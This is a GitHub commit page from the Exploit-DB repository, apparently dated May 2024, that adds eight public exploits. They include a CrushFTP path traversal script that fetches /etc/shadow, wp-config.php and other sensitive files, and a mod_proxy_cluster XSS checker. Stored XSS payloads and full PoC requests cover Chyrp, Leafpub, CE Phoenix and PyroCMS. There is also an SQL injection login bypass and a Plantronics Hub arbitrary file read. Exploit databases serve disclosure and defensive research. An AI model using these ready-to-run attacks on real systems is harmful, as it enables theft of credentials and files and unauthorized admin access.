Skip to content

Commit

Permalink
DB: 2024-05-14
Browse files Browse the repository at this point in the history 
10 changes to exploits/shellcodes/ghdb

CrushFTP < 11.1.0 - Directory Traversal

Apache mod_proxy_cluster - Stored XSS

CE Phoenix Version 1.0.8.20 - Stored XSS

Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS)

Leafpub 1.1.9 - Stored Cross-Site Scripting (XSS)

Prison Management System - SQL Injection Authentication Bypass

PyroCMS v3.0.1 - Stored XSS

Plantronics Hub 3.25.1 - Arbitrary File Read
  • Loading branch information
Exploit-DB committed May 14, 2024
1 parent edacab1 commit 9d17a3d
Show file tree
Hide file tree
Showing 10 changed files with 393 additions and 0 deletions.
63 changes: 63 additions & 0 deletions exploits/multiple/remote/52012.py
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,63 @@
## Exploit Title: CrushFTP Directory Traversal
## Google Dork: N/A
# Date: 2024-04-30
# Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly)
## Vendor Homepage: https://www.crushftp.com/
## Software Link: https://www.crushftp.com/download/
## Version: below 10.7.1 and 11.1.0 (as well as legacy 9.x)
## Tested on: Windows10

import requests
import re

# Regular expression to validate the URL
def is_valid_url(url):
regex = re.compile(
r'^(?:http|ftp)s?://' # http:// or https://
r'(?:(?:A-Z0-9?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain...
r'localhost|' # localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}|' # ...or ipv4
r'\[?[A-F0-9]*:[A-F0-9:]+\]?)' # ...or ipv6
r'(?::\d+)?' # optional: port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
return re.match(regex, url) is not None

# Function to scan for the vulnerability
def scan_for_vulnerability(url, target_files):
print("Scanning for vulnerability in the following files:")
for target_file in target_files:
print(target_file)

for target_file in target_files:
try:
response = requests.get(url + "?/../../../../../../../../../../" + target_file, timeout=10)
if response.status_code == 200 and target_file.split('/')[-1] in response.text:
print("vulnerability detected in file", target_file)
print("Content of file", target_file, ":")
print(response.text)
else:
print("vulnerability not detected or unexpected response for file", target_file)
except requests.exceptions.RequestException as e:
print("Error connecting to the server:", e)

# User input
input_url = input("Enter the URL of the CrushFTP server: ")

# Validate the URL
if is_valid_url(input_url):
# Expanded list of allowed files
target_files = [
"/var/www/html/index.php",
"/var/www/html/wp-config.php",
"/etc/passwd",
"/etc/shadow",
"/etc/hosts",
"/etc/ssh/sshd_config",
"/etc/mysql/my.cnf",
# Add more files as needed

]
# Start the scan
scan_for_vulnerability(input_url, target_files)
else:
print("Invalid URL entered. Please enter a valid URL.")
109 changes: 109 additions & 0 deletions exploits/php/webapps/52010.py
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,109 @@
import requests
import argparse
from bs4 import BeautifulSoup
from urllib.parse import urlparse, parse_qs, urlencode, urlunparse
from requests.exceptions import RequestException

class Colors:
RED = '\033[91m'
GREEN = '\033[1;49;92m'
RESET = '\033[0m'

def get_cluster_manager_url(base_url, path):
print(Colors.GREEN + f"Preparing the groundwork for the exploitation on {base_url}..." + Colors.RESET)
try:
response = requests.get(base_url + path)
response.raise_for_status()
except requests.exceptions.RequestException as e:
print(Colors.RED + f"Error: {e}" + Colors.RESET)
return None

print(Colors.GREEN + f"Starting exploit check on {base_url}..." + Colors.RESET)

if response.status_code == 200:
print(Colors.GREEN + f"Check executed successfully on {base_url}..." + Colors.RESET)
# Use BeautifulSoup to parse the HTML content
soup = BeautifulSoup(response.text, 'html.parser')

# Find all 'a' tags with 'href' attribute
all_links = soup.find_all('a', href=True)

# Search for the link containing the Alias parameter in the href attribute
cluster_manager_url = None
for link in all_links:
parsed_url = urlparse(link['href'])
query_params = parse_qs(parsed_url.query)
alias_value = query_params.get('Alias', [None])[0]

if alias_value:
print(Colors.GREEN + f"Alias value found" + Colors.RESET)
cluster_manager_url = link['href']
break

if cluster_manager_url:
print(Colors.GREEN + f"Preparing the injection on {base_url}..." + Colors.RESET)
return cluster_manager_url
else:
print(Colors.RED + f"Error: Alias value not found on {base_url}..." + Colors.RESET)
return None

print(Colors.RED + f"Error: Unable to get the initial step on {base_url}")
return None

def update_alias_value(url):
parsed_url = urlparse(url)
query_params = parse_qs(parsed_url.query, keep_blank_values=True)
query_params['Alias'] = ["<DedSec-47>"]
updated_url = urlunparse(parsed_url._replace(query=urlencode(query_params, doseq=True)))
print(Colors.GREEN + f"Injection executed successfully on {updated_url}" + Colors.RESET)
return updated_url

def check_response_for_value(url, check_value):
response = requests.get(url)
if check_value in response.text:
print(Colors.RED + "Website is vulnerable POC by :")
print(Colors.GREEN + """
____ _ ____ _ _ _____
| _ \ ___ __| / ___| ___ ___ | || |___ |
| | | |/ _ \/ _` \___ \ / _ \/ __| ____| || | / /
| |_| | __/ (_| |___) | __/ (_ |____|__ | / /
|____/ \___|\__,_|____/ \___|\___| |_|/_/
github.com/DedSec-47 """)
else:
print(Colors.GREEN + "Website is not vulnerable POC by :")
print(Colors.GREEN + """
____ _ ____ _ _ _____
| _ \ ___ __| / ___| ___ ___ | || |___ |
| | | |/ _ \/ _` \___ \ / _ \/ __| ____| || | / /
| |_| | __/ (_| |___) | __/ (_ |____|__ | / /
|____/ \___|\__,_|____/ \___|\___| |_|/_/
github.com/DedSec-47 """)

def main():
# Create a command-line argument parser
parser = argparse.ArgumentParser(description="python CVE-2023-6710.py -t https://example.com -u /cluster-manager")

# Add a command-line argument for the target (-t/--target)
parser.add_argument('-t', '--target', help='Target domain (e.g., https://example.com)', required=True)

# Add a command-line argument for the URL path (-u/--url)
parser.add_argument('-u', '--url', help='URL path (e.g., /cluster-manager)', required=True)

# Parse the command-line arguments
args = parser.parse_args()

# Get the cluster manager URL from the specified website
cluster_manager_url = get_cluster_manager_url(args.target, args.url)

# Check if the cluster manager URL is found
if cluster_manager_url:
# Modify the URL by adding the cluster manager value
modified_url = args.target + cluster_manager_url
modified_url = update_alias_value(args.target + cluster_manager_url)
print(Colors.GREEN + "Check executed successfully" + Colors.RESET)

# Check the response for the value "<DedSec-47>"
check_response_for_value(modified_url, "<DedSec-47>")

if __name__ == "__main__":
main()
80 changes: 80 additions & 0 deletions exploits/php/webapps/52013.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,80 @@
# Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS)
# Date: 2024-04-24
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://github.com/chyrp/
# Software Link: https://github.com/chyrp/chyrp/archive/refs/tags/v2.5.2.zip
# Version: 2.5.2
# Tested on: MacOS

### Steps to Reproduce ###

- Login from the address: http://localhost/chyrp/?action=login.
- Click on 'Write'.
- Type this payload into the 'Title' field: "><img src=x onerror=alert(
"Stored")>
- Fill in the 'Body' area and click 'Publish'.
- An alert message saying "Stored" will appear in front of you.

### PoC Request ###

POST /chyrp/admin/?action=add_post HTTP/1.1
Host: localhost
Cookie: ChyrpSession=c4194c16a28dec03e449171087981d11;
show_more_options=true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
Gecko/20100101 Firefox/124.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,
*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;
boundary=---------------------------28307567523233313132815561598
Content-Length: 1194
Origin: http://localhost
Referer: http://localhost/chyrp/admin/?action=write_post
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="title"

"><img src=x onerror=alert("Stored")>
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="body"

<p>1337</p>
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="status"

public
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="slug"


-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="created_at"

04/24/24 12:31:57
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="original_time"

04/24/24 12:31:57
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="trackbacks"


-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="feather"

text
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="hash"

11e11aba15114f918ec1c2e6b8f8ddcf
-----------------------------28307567523233313132815561598--
39 changes: 39 additions & 0 deletions exploits/php/webapps/52014.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,39 @@
# Leafpub 1.1.9 - Stored Cross-Site Scripting (XSS)
# Date: 2024-04-24
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://github.com/Leafpub
# Software Link: https://github.com/Leafpub/leafpub
# Version: 1.1.9
# Tested on: MacOS

### Steps to Reproduce ###

- Please login from this address: http://localhost/leafpub/admin/login
- Click on the Settings > Advanced
- Enter the following payload into the "Custom Code" area and save it: ("><img
src=x onerror=alert("Stored")>)
- An alert message saying "Stored" will appear in front of you.

### PoC Request ###

POST /leafpub/api/settings HTTP/1.1
Host: localhost
Cookie:
authToken=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MTM5NjQ2MTcsImV4cCI6MTcxMzk2ODIxNywiZGF0YSI6eyJ1c2VybmFtZSI6ImFkbWluIn19.967N5NYdUKxv1sOXO_OTFiiLlm7sfgDWPXKX7iEZwlo
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 476
Origin: http://localhost
Referer: http://localhost/leafpub/admin/settings
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

title=A+Leafpub+Blog&tagline=Go+forth+and+create!&homepage=&twitter=&theme=range&posts-per-page=10&cover=source%2Fassets%2Fimg%2Fleaves.jpg&logo=source%2Fassets%2Fimg%2Flogo-color.png&favicon=source%2Fassets%2Fimg%2Flogo-color.png&language=en-us&timezone=America%2FNew_York&default-title=Untitled+Post&default-content=Start+writing+here...&head-code=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22Stored%22)%3E&foot-code=&generator=on&mailer=default&maintenance-message=&hbs-cache=on
14 changes: 14 additions & 0 deletions exploits/php/webapps/52015.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,14 @@
# Exploit Title: CE Phoenix Version 1.0.8.20 - Stored XSS
# Date: 2023-11-25
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://phoenixcart.org/
# Version: v3.0.1
# Tested on: https://www.softaculous.com/apps/ecommerce/CE_Phoenix

## POC:

1-Login admin panel , go to this url : https://demos6.softaculous.com/CE_Phoenixx3r6jqi4kl/admin/currencies.php
2-Click edit and write in Title field your payload : <sVg/onLy=1 onLoaD=confirm(1)//
3-Save it and go to this url : https://demos6.softaculous.com/CE_Phoenixx3r6jqi4kl/admin/currencies.php
4-You will be see alert button
17 changes: 17 additions & 0 deletions exploits/php/webapps/52016.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,17 @@
# Exploit Title: PyroCMS v3.0.1 - Stored XSS
# Date: 2023-11-25
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://pyrocms.com/
# Version: v3.0.1
# Tested on: https://www.softaculous.com/apps/cms/PyroCMS



----------------------------------------------------------------------------------------------------


1-Login admin panel , go to this url : https://127.0.0.1/public/admin/redirects/edit/1
2-Write in Redirect From field your payload : <sVg/onLy=1 onLoaD=confirm(1)//
3-Save it and go to this url : https://127.0.0.1/public/admin/redirects
4-You will be see alert button
14 changes: 14 additions & 0 deletions exploits/php/webapps/52017.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,14 @@
# Exploit : Prison Management System Using PHP -SQL Injection Authentication Bypass
# Date: 15/03/2024
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://www.sourcecodester.com
# Software Link:https://www.sourcecodester.com/sql/17287/prison-management-system.html
# Tested on: Windows ,XAMPP
# CVE : CVE-2024-33288


# Proof of Concept:
Step 1-Visit http://localhost/prison/
Step 2 - Click on Admin Dashboard button and redirect on login page.
Step 3– Enter username as admin' or '1'='1 and password as 123456
Step 4 – Click sing In and now you will be logged in as admin.
25 changes: 25 additions & 0 deletions exploits/windows/local/52011.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
# Exploit Title: Plantronics Hub 3.25.1 – Arbitrary File Read
# Date: 2024-05-10
# Exploit Author: Farid Zerrouk from Deloitte Belgium, Alaa Kachouh from
Mastercard
# Vendor Homepage:
https://support.hp.com/us-en/document/ish_9869257-9869285-16/hpsbpy03895
# Version: Plantronics Hub for Windows version 3.25.1
# Tested on: Windows 10/11
# CVE : CVE-2024-27460

As a regular user drop a file called "MajorUpgrade.config" inside the
"C:\ProgramData\Plantronics\Spokes3G" directory. The content of
MajorUpgrade.config should look like the following one liner:
^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config

Exchange <FULL-PATH-TO-YOUR-DESIRED-FILE> with a desired file to read/copy
(any file on the system). The desired file will be copied into C:\Program
Files (x86)\Plantronics\Spokes3G\UpdateServiceTemp

Steps to reproduce (POC):
- Open cmd.exe
- Navigate using cd C:\ProgramData\Plantronics\Spokes3G
- echo ^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config
- Desired file will be copied into C:\Program Files
(x86)\Plantronics\Spokes3G\UpdateServiceTemp
Loading

0 comments on commit 9d17a3d

Please sign in to comment.